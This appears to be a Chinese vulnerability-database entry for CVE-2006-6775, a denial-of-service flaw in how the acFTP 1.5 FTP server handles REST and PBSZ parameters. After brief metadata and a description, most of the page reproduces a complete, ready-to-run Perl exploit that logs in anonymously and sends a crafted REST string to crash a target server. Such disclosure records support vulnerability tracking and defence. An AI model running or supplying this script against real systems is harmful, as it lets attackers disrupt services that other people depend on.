acFTP服务器REST/PBSZ参数处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111843 漏洞类型 其他
发布时间 2006-12-23 更新时间 2007-01-02
CVE编号 CVE-2006-6775 CNNVD-ID CNNVD-200612-568
漏洞平台 Windows CVSS评分 3.5
|漏洞来源
https://www.exploit-db.com/exploits/2985
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-568
|漏洞详情
acFTP是一款开源的基于Windows平台的FTP服务器程序,用于取代Windows系统自带的FTP服务器。acFTP在处理传送给REST和PBSZ命令的参数时存在输入验证错误,攻击者通过提交特制字符串做为上述命令的参数导致拒绝服务。
|漏洞EXP
#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip port\n";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!\n";

$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");

print "Server exploited\n";

# milw0rm.com [2006-12-23]
|参考资料

来源:BID
名称:21767
链接:http://www.securityfocus.com/bid/21767
来源:MILW0RM
名称:2985
链接:http://www.milw0rm.com/exploits/2985
来源:VUPEN
名称:ADV-2006-5149
链接:http://www.frsirt.com/english/advisories/2006/5149
来源:SECUNIA
名称:23481
链接:http://secunia.com/advisories/23481
来源:MILW0RM
名称:2985
链接:http://milw0rm.com/exploits/2985